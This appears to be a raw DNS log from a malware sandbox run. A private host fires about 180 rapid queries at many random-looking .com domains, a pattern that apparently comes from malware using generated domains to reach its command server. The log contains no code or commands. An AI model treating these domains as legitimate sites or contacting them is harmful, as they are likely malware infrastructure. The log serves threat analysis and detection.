                                                                                                                                                                                                              Aug 23, 2024 18:48:56.000531912 CEST192.168.2.41.1.1.10x439cStandard query (0)pufymiv.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                              Aug 23, 2024 18:48:56.000907898 CEST192.168.2.41.1.1.10x5665Standard query (0)lyxylyj.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                              Aug 23, 2024 18:48:56.001209021 CEST192.168.2.41.1.1.10xdb14Standard query (0)gaqydaz.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                              Aug 23, 2024 18:48:56.001298904 CEST192.168.2.41.1.1.10xfb2dStandard query (0)vofymif.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                              Aug 23, 2024 18:48:56.001737118 CEST192.168.2.41.1.1.10x7be5Standard query (0)qeqysap.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                              Aug 23, 2024 18:48:56.001909018 CEST192.168.2.41.1.1.10xa083Standard query (0)puzylyq.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                              Aug 23, 2024 18:48:56.002355099 CEST192.168.2.41.1.1.10x14d4Standard query (0)gadynub.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                              Aug 23, 2024 18:48:56.002767086 CEST192.168.2.41.1.1.10x6881Standard query (0)lymysox.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                              Aug 23, 2024 18:48:56.002947092 CEST192.168.2.41.1.1.10x1d05Standard query (0)volykek.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                              Aug 23, 2024 18:48:56.003441095 CEST192.168.2.41.1.1.10x1388Standard query (0)qedynug.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                              Aug 23, 2024 18:48:56.003654957 CEST192.168.2.41.1.1.10x195fStandard query (0)pumypop.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                              Aug 23, 2024 18:48:56.003988981 CEST192.168.2.41.1.1.10x7c3Standard query (0)galykew.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                              Aug 23, 2024 18:48:56.004519939 CEST192.168.2.41.1.1.10x71d8Standard query (0)lysynun.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                              Aug 23, 2024 18:48:56.004729033 CEST192.168.2.41.1.1.10x8e2bStandard query (0)vonypic.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                              Aug 23, 2024 18:48:56.005242109 CEST192.168.2.41.1.1.10xb920Standard query (0)qekykal.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                              Aug 23, 2024 18:48:56.005841970 CEST192.168.2.41.1.1.10xe2c0Standard query (0)pupybyg.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                              Aug 23, 2024 18:48:56.006602049 CEST192.168.2.41.1.1.10xdb11Standard query (0)vopybym.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                              Aug 23, 2024 18:48:56.006711006 CEST192.168.2.41.1.1.10xfd42Standard query (0)lykyjar.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                              Aug 23, 2024 18:48:56.006869078 CEST192.168.2.41.1.1.10x8d9bStandard query (0)ganypis.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                              Aug 23, 2024 18:48:56.007461071 CEST192.168.2.41.1.1.10xb177Standard query (0)qebytuv.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                              Aug 23, 2024 18:48:56.007688046 CEST192.168.2.41.1.1.10x3728Standard query (0)pujyjol.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                              Aug 23, 2024 18:48:56.008230925 CEST192.168.2.41.1.1.10xf518Standard query (0)lyvytud.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                              Aug 23, 2024 18:48:56.008270025 CEST192.168.2.41.1.1.10xbfdcStandard query (0)gatyveh.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                              Aug 23, 2024 18:48:56.008872032 CEST192.168.2.41.1.1.10xcd1cStandard query (0)vojyjot.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                              Aug 23, 2024 18:48:56.010576963 CEST192.168.2.41.1.1.10x6b34Standard query (0)qetyveq.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                              Aug 23, 2024 18:48:56.010742903 CEST192.168.2.41.1.1.10x350fStandard query (0)puvytuv.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                              Aug 23, 2024 18:48:56.010931969 CEST192.168.2.41.1.1.10xe07bStandard query (0)lyryvaj.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                              Aug 23, 2024 18:48:56.011230946 CEST192.168.2.41.1.1.10xe016Standard query (0)gahyhiz.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                              Aug 23, 2024 18:48:56.011502028 CEST192.168.2.41.1.1.10xea19Standard query (0)vocyryf.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                              Aug 23, 2024 18:48:56.011609077 CEST192.168.2.41.1.1.10xbef7Standard query (0)qegyhip.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                              Aug 23, 2024 18:48:56.011763096 CEST192.168.2.41.1.1.10x4d04Standard query (0)gacyryb.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                              Aug 23, 2024 18:48:56.011895895 CEST192.168.2.41.1.1.10x7e4Standard query (0)purycaq.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                              Aug 23, 2024 18:48:56.013356924 CEST192.168.2.41.1.1.10x23aaStandard query (0)lygygux.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                              Aug 23, 2024 18:48:56.013784885 CEST192.168.2.41.1.1.10xa1b3Standard query (0)qexyreg.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                              Aug 23, 2024 18:48:56.013958931 CEST192.168.2.41.1.1.10xee4cStandard query (0)gaqycow.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                              Aug 23, 2024 18:48:56.014250994 CEST192.168.2.41.1.1.10x5f07Standard query (0)pufygup.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                              Aug 23, 2024 18:48:56.014482975 CEST192.168.2.41.1.1.10x7a11Standard query (0)lyxywen.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                              Aug 23, 2024 18:48:56.014796019 CEST192.168.2.41.1.1.10xfacfStandard query (0)vofyguc.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                              Aug 23, 2024 18:48:56.014944077 CEST192.168.2.41.1.1.10x8a8dStandard query (0)qeqyxil.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                              Aug 23, 2024 18:48:56.015178919 CEST192.168.2.41.1.1.10xab76Standard query (0)vowycok.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                              Aug 23, 2024 18:48:56.016168118 CEST192.168.2.41.1.1.10x5270Standard query (0)lymyxir.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                              Aug 23, 2024 18:48:56.016661882 CEST192.168.2.41.1.1.10x451fStandard query (0)puzywag.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                              Aug 23, 2024 18:48:56.016830921 CEST192.168.2.41.1.1.10xfc65Standard query (0)volyqam.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                              Aug 23, 2024 18:48:56.016974926 CEST192.168.2.41.1.1.10x9d72Standard query (0)qedyfyv.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                              Aug 23, 2024 18:48:56.017924070 CEST192.168.2.41.1.1.10x4e4dStandard query (0)galyqoh.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                              Aug 23, 2024 18:48:56.018168926 CEST192.168.2.41.1.1.10x9a35Standard query (0)gadyfys.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                              Aug 23, 2024 18:48:56.018418074 CEST192.168.2.41.1.1.10x8d87Standard query (0)lysyfed.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                              Aug 23, 2024 18:48:56.018610954 CEST192.168.2.41.1.1.10xf456Standard query (0)pumyxul.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                              Aug 23, 2024 18:48:56.246710062 CEST192.168.2.41.1.1.10xed97Standard query (0)gahyhiz.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                              Aug 23, 2024 18:48:56.956587076 CEST192.168.2.41.1.1.10x55c5Standard query (0)vonyzut.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                              Aug 23, 2024 18:48:56.957114935 CEST192.168.2.41.1.1.10xc027Standard query (0)qekyqoq.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                              Aug 23, 2024 18:48:56.957720995 CEST192.168.2.41.1.1.10xe03bStandard query (0)pupydev.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                              Aug 23, 2024 18:48:56.957720995 CEST192.168.2.41.1.1.10x5e64Standard query (0)lykymij.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                              Aug 23, 2024 18:48:56.958061934 CEST192.168.2.41.1.1.10x672eStandard query (0)qebylyp.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                              Aug 23, 2024 18:48:56.958406925 CEST192.168.2.41.1.1.10x8f23Standard query (0)pujymiq.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                              Aug 23, 2024 18:48:56.958818913 CEST192.168.2.41.1.1.10xdb37Standard query (0)gatydab.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                              Aug 23, 2024 18:48:56.958905935 CEST192.168.2.41.1.1.10xf328Standard query (0)lyvylyx.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                              Aug 23, 2024 18:48:56.959393978 CEST192.168.2.41.1.1.10xef12Standard query (0)qetysog.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                              Aug 23, 2024 18:48:56.959475040 CEST192.168.2.41.1.1.10x275fStandard query (0)vojymuk.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                              Aug 23, 2024 18:48:56.959902048 CEST192.168.2.41.1.1.10x28feStandard query (0)puvylep.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                              Aug 23, 2024 18:48:56.960303068 CEST192.168.2.41.1.1.10xd66cStandard query (0)lyryson.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                              Aug 23, 2024 18:48:56.960427999 CEST192.168.2.41.1.1.10x52a5Standard query (0)gahynuw.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                              Aug 23, 2024 18:48:56.960660934 CEST192.168.2.41.1.1.10x93aaStandard query (0)vocykec.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                              Aug 23, 2024 18:48:56.961215019 CEST192.168.2.41.1.1.10xb314Standard query (0)ganyzuz.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                              Aug 23, 2024 18:48:56.961456060 CEST192.168.2.41.1.1.10x3d76Standard query (0)purypig.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                              Aug 23, 2024 18:48:56.961633921 CEST192.168.2.41.1.1.10xfefcStandard query (0)qegynul.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                              Aug 23, 2024 18:48:56.961702108 CEST192.168.2.41.1.1.10x8e78Standard query (0)vopydaf.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                              Aug 23, 2024 18:48:56.962272882 CEST192.168.2.41.1.1.10xf6a6Standard query (0)gacykas.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                              Aug 23, 2024 18:48:56.962899923 CEST192.168.2.41.1.1.10x87a0Standard query (0)lygynyr.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                              Aug 23, 2024 18:48:56.963531971 CEST192.168.2.41.1.1.10x8823Standard query (0)vowypim.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                              Aug 23, 2024 18:48:56.963807106 CEST192.168.2.41.1.1.10xbe5Standard query (0)qexykav.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                              Aug 23, 2024 18:48:56.963867903 CEST192.168.2.41.1.1.10x4981Standard query (0)pufybyl.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                              Aug 23, 2024 18:48:56.964345932 CEST192.168.2.41.1.1.10x4c3cStandard query (0)gaqypuh.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                              Aug 23, 2024 18:48:56.964345932 CEST192.168.2.41.1.1.10xa8e9Standard query (0)lyxyjod.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                              Aug 23, 2024 18:48:56.964889050 CEST192.168.2.41.1.1.10x684Standard query (0)vofybet.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                              Aug 23, 2024 18:48:56.964889050 CEST192.168.2.41.1.1.10x6b8bStandard query (0)qeqytuq.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                              Aug 23, 2024 18:48:56.965409994 CEST192.168.2.41.1.1.10xd8fStandard query (0)puzyjov.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                              Aug 23, 2024 18:48:56.965650082 CEST192.168.2.41.1.1.10x3bedStandard query (0)gadyvez.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                              Aug 23, 2024 18:48:56.965650082 CEST192.168.2.41.1.1.10x1d49Standard query (0)lymytuj.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                              Aug 23, 2024 18:48:56.966211081 CEST192.168.2.41.1.1.10x74a5Standard query (0)volyjif.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                              Aug 23, 2024 18:48:56.966895103 CEST192.168.2.41.1.1.10x23e7Standard query (0)galyhib.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                              Aug 23, 2024 18:48:56.966895103 CEST192.168.2.41.1.1.10xcb91Standard query (0)qedyvap.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                              Aug 23, 2024 18:48:56.967077017 CEST192.168.2.41.1.1.10x5272Standard query (0)pumytyq.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                              Aug 23, 2024 18:48:56.967578888 CEST192.168.2.41.1.1.10xee47Standard query (0)lysyvax.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                              Aug 23, 2024 18:48:56.967735052 CEST192.168.2.41.1.1.10x7890Standard query (0)vonyryk.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                              Aug 23, 2024 18:48:56.967916965 CEST192.168.2.41.1.1.10xbce1Standard query (0)qekyhug.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                              Aug 23, 2024 18:48:56.968441963 CEST192.168.2.41.1.1.10xf183Standard query (0)ganyrew.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                              Aug 23, 2024 18:48:56.968790054 CEST192.168.2.41.1.1.10x604fStandard query (0)pupycop.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                              Aug 23, 2024 18:48:56.969013929 CEST192.168.2.41.1.1.10xaa03Standard query (0)lykygun.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                              Aug 23, 2024 18:48:56.969542027 CEST192.168.2.41.1.1.10x13f8Standard query (0)vopycoc.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                              Aug 23, 2024 18:48:56.969542027 CEST192.168.2.41.1.1.10xf265Standard query (0)qebyrel.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                              Aug 23, 2024 18:48:56.969949007 CEST192.168.2.41.1.1.10x88e4Standard query (0)pujygug.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                              Aug 23, 2024 18:48:56.970093966 CEST192.168.2.41.1.1.10x886Standard query (0)gatycis.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                              Aug 23, 2024 18:48:56.970608950 CEST192.168.2.41.1.1.10xcae9Standard query (0)lyvywar.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                              Aug 23, 2024 18:48:56.970963001 CEST192.168.2.41.1.1.10x5c33Standard query (0)puvywal.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                              Aug 23, 2024 18:48:56.971239090 CEST192.168.2.41.1.1.10xa1fcStandard query (0)qetyxiv.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                              Aug 23, 2024 18:48:56.973064899 CEST192.168.2.41.1.1.10xcac0Standard query (0)gahyfyh.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                              Aug 23, 2024 18:48:56.973064899 CEST192.168.2.41.1.1.10x9734Standard query (0)gacyqoz.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                              Aug 23, 2024 18:48:56.973176003 CEST192.168.2.41.1.1.10xad47Standard query (0)lyryxud.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                              Aug 23, 2024 18:48:56.973309040 CEST192.168.2.41.1.1.10x62ecStandard query (0)vojygym.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                              Aug 23, 2024 18:48:56.973443985 CEST192.168.2.41.1.1.10xa6c6Standard query (0)qegyfeq.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                              Aug 23, 2024 18:48:56.973443985 CEST192.168.2.41.1.1.10x9b40Standard query (0)qexyqip.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                              Aug 23, 2024 18:48:56.973617077 CEST192.168.2.41.1.1.10x480cStandard query (0)pufydaq.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                              Aug 23, 2024 18:48:56.973722935 CEST192.168.2.41.1.1.10x4229Standard query (0)gaqyzyb.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                              Aug 23, 2024 18:48:56.973833084 CEST192.168.2.41.1.1.10xc22fStandard query (0)lyxymix.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                              Aug 23, 2024 18:48:56.973833084 CEST192.168.2.41.1.1.10xf470Standard query (0)vowyzuf.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                              Aug 23, 2024 18:48:56.974020004 CEST192.168.2.41.1.1.10x810aStandard query (0)vofydak.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                              Aug 23, 2024 18:48:56.974184036 CEST192.168.2.41.1.1.10xf152Standard query (0)qeqylyg.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                              Aug 23, 2024 18:48:56.974404097 CEST192.168.2.41.1.1.10x8436Standard query (0)lygyfej.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                              Aug 23, 2024 18:48:56.974404097 CEST192.168.2.41.1.1.10x3880Standard query (0)puzymup.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                              Aug 23, 2024 18:48:56.974487066 CEST192.168.2.41.1.1.10x87cbStandard query (0)gadydow.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                              Aug 23, 2024 18:48:56.974662066 CEST192.168.2.41.1.1.10xc400Standard query (0)vocyqot.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                              Aug 23, 2024 18:48:56.974662066 CEST192.168.2.41.1.1.10x58c3Standard query (0)puryxuv.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                              Aug 23, 2024 18:48:57.508971930 CEST192.168.2.41.1.1.10x8209Standard query (0)lymylen.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                              Aug 23, 2024 18:48:57.509469986 CEST192.168.2.41.1.1.10x84dbStandard query (0)qedysol.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                              Aug 23, 2024 18:48:57.509562016 CEST192.168.2.41.1.1.10x80a1Standard query (0)volymuc.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                              Aug 23, 2024 18:48:57.510099888 CEST192.168.2.41.1.1.10x7ab9Standard query (0)galynus.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                              Aug 23, 2024 18:48:57.510241985 CEST192.168.2.41.1.1.10x29c9Standard query (0)pumyleg.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                              Aug 23, 2024 18:48:57.510726929 CEST192.168.2.41.1.1.10xd729Standard query (0)lysysir.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                              Aug 23, 2024 18:48:57.510864973 CEST192.168.2.41.1.1.10x1353Standard query (0)vonykam.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                              Aug 23, 2024 18:48:57.511493921 CEST192.168.2.41.1.1.10x42abStandard query (0)ganykah.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                              Aug 23, 2024 18:48:57.511518955 CEST192.168.2.41.1.1.10xd34aStandard query (0)qekynyv.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                              Aug 23, 2024 18:48:57.511765957 CEST192.168.2.41.1.1.10x4e68Standard query (0)lykynyd.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                              Aug 23, 2024 18:48:57.512259007 CEST192.168.2.41.1.1.10x5b8bStandard query (0)pupypil.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                              Aug 23, 2024 18:48:57.512583971 CEST192.168.2.41.1.1.10xa50fStandard query (0)vopyput.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                              Aug 23, 2024 18:48:57.512696028 CEST192.168.2.41.1.1.10x8a54Standard query (0)qebykoq.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                              Aug 23, 2024 18:48:57.513358116 CEST192.168.2.41.1.1.10x5188Standard query (0)pujybev.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                              Aug 23, 2024 18:48:57.513694048 CEST192.168.2.41.1.1.10x8f68Standard query (0)gatypuz.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                              Aug 23, 2024 18:48:57.514842987 CEST192.168.2.41.1.1.10xa9b8Standard query (0)lyvyjoj.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                              Aug 23, 2024 18:48:57.515182972 CEST192.168.2.41.1.1.10x5704Standard query (0)vojybef.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                              Aug 23, 2024 18:48:57.516066074 CEST192.168.2.41.1.1.10x6c2Standard query (0)qetytup.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                              Aug 23, 2024 18:48:57.516594887 CEST192.168.2.41.1.1.10xa7e5Standard query (0)puvyjiq.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                              Aug 23, 2024 18:48:57.517450094 CEST192.168.2.41.1.1.10xab3bStandard query (0)gahyvab.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                              Aug 23, 2024 18:48:57.519821882 CEST192.168.2.41.1.1.10x89c9Standard query (0)lyrytyx.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                              Aug 23, 2024 18:48:57.520457983 CEST192.168.2.41.1.1.10xded5Standard query (0)vocyjik.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                              Aug 23, 2024 18:48:57.521169901 CEST192.168.2.41.1.1.10x3308Standard query (0)qegyvag.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                              Aug 23, 2024 18:48:57.521533012 CEST192.168.2.41.1.1.10xc11fStandard query (0)purytyp.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                              Aug 23, 2024 18:48:57.522382975 CEST192.168.2.41.1.1.10xe2d4Standard query (0)gacyhuw.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                              Aug 23, 2024 18:48:57.522849083 CEST192.168.2.41.1.1.10x6cb3Standard query (0)lygyvon.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                              Aug 23, 2024 18:48:57.523546934 CEST192.168.2.41.1.1.10xb35Standard query (0)vowyrec.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                              Aug 23, 2024 18:48:57.524043083 CEST192.168.2.41.1.1.10x168dStandard query (0)qexyhul.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                              Aug 23, 2024 18:48:57.524805069 CEST192.168.2.41.1.1.10x1abcStandard query (0)pufycog.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                              Aug 23, 2024 18:48:57.525094986 CEST192.168.2.41.1.1.10x123aStandard query (0)gaqyres.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                              Aug 23, 2024 18:48:57.526118994 CEST192.168.2.41.1.1.10x7495Standard query (0)lyxygur.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                              Aug 23, 2024 18:48:57.526485920 CEST192.168.2.41.1.1.10xb4c7Standard query (0)vofycim.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                              Aug 23, 2024 18:48:57.527551889 CEST192.168.2.41.1.1.10x2613Standard query (0)qeqyrav.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                              Aug 23, 2024 18:48:57.528120995 CEST192.168.2.41.1.1.10x59ecStandard query (0)puzygyl.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                              Aug 23, 2024 18:48:57.529037952 CEST192.168.2.41.1.1.10x944dStandard query (0)gadycih.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                              Aug 23, 2024 18:48:57.529656887 CEST192.168.2.41.1.1.10xcf07Standard query (0)lymywad.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                              Aug 23, 2024 18:48:57.530911922 CEST192.168.2.41.1.1.10xad73Standard query (0)volygyt.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                              Aug 23, 2024 18:48:57.532017946 CEST192.168.2.41.1.1.10xaf0dStandard query (0)qedyxuq.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                              Aug 23, 2024 18:48:57.535172939 CEST192.168.2.41.1.1.10x163dStandard query (0)pumywov.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                              Aug 23, 2024 18:48:57.537120104 CEST192.168.2.41.1.1.10xf5b0Standard query (0)galyfez.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                              Aug 23, 2024 18:48:57.537296057 CEST192.168.2.41.1.1.10xcbd4Standard query (0)vonyqof.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                              Aug 23, 2024 18:48:57.537668943 CEST192.168.2.41.1.1.10x26cfStandard query (0)lysyxuj.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                              Aug 23, 2024 18:48:57.537816048 CEST192.168.2.41.1.1.10x790Standard query (0)qekyfep.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                              Aug 23, 2024 18:48:57.538399935 CEST192.168.2.41.1.1.10x36d8Standard query (0)ganyqib.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                              Aug 23, 2024 18:48:57.538774014 CEST192.168.2.41.1.1.10xeab7Standard query (0)lykyfax.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                              Aug 23, 2024 18:48:57.538961887 CEST192.168.2.41.1.1.10xc316Standard query (0)pupyxuq.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                              Aug 23, 2024 18:48:57.539279938 CEST192.168.2.41.1.1.10xadc1Standard query (0)vopyzyk.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                              Aug 23, 2024 18:48:57.540028095 CEST192.168.2.41.1.1.10x5f9dStandard query (0)qebyqig.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                              Aug 23, 2024 18:48:57.540302992 CEST192.168.2.41.1.1.10xdc59Standard query (0)gatyzyw.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                              Aug 23, 2024 18:48:57.540555954 CEST192.168.2.41.1.1.10x2fd1Standard query (0)pujydap.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                              Aug 23, 2024 18:48:57.541163921 CEST192.168.2.41.1.1.10x69c2Standard query (0)lyvymun.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                              Aug 23, 2024 18:48:57.541523933 CEST192.168.2.41.1.1.10xc32aStandard query (0)qetylel.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                              Aug 23, 2024 18:48:57.541697025 CEST192.168.2.41.1.1.10x2aadStandard query (0)gahydos.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                              Aug 23, 2024 18:48:57.541789055 CEST192.168.2.41.1.1.10xbef2Standard query (0)puvymug.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                              Aug 23, 2024 18:48:57.542021990 CEST192.168.2.41.1.1.10xc8e9Standard query (0)lyryler.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                              Aug 23, 2024 18:48:57.542157888 CEST192.168.2.41.1.1.10xf3c6Standard query (0)vojydoc.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                              Aug 23, 2024 18:48:57.543114901 CEST192.168.2.41.1.1.10xb0bcStandard query (0)vocymum.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                              Aug 23, 2024 18:48:57.543308973 CEST192.168.2.41.1.1.10xfc4Standard query (0)qegysiv.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                              Aug 23, 2024 18:48:57.543549061 CEST192.168.2.41.1.1.10x6ee1Standard query (0)purylal.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                              Aug 23, 2024 18:48:57.543703079 CEST192.168.2.41.1.1.10x506cStandard query (0)gacynyh.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                              Aug 23, 2024 18:48:57.544053078 CEST192.168.2.41.1.1.10xae63Standard query (0)lygysid.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                              Aug 23, 2024 18:48:57.544305086 CEST192.168.2.41.1.1.10x7a36Standard query (0)qexynyq.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                              Aug 23, 2024 18:48:57.544574976 CEST192.168.2.41.1.1.10x6191Standard query (0)vowykat.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                              Aug 23, 2024 18:48:57.544915915 CEST192.168.2.41.1.1.10xe39dStandard query (0)pufypuv.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                              Aug 23, 2024 18:48:57.730747938 CEST192.168.2.41.1.1.10xafb7Standard query (0)gaqykoz.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                              Aug 23, 2024 18:48:57.731004000 CEST192.168.2.41.1.1.10xa6bfStandard query (0)qeqykop.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                              Aug 23, 2024 18:48:57.731544971 CEST192.168.2.41.1.1.10x3885Standard query (0)puzybeq.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                              Aug 23, 2024 18:48:57.763485909 CEST192.168.2.41.1.1.10x6b92Standard query (0)gadypub.comA (IP address)IN (0x0001)false
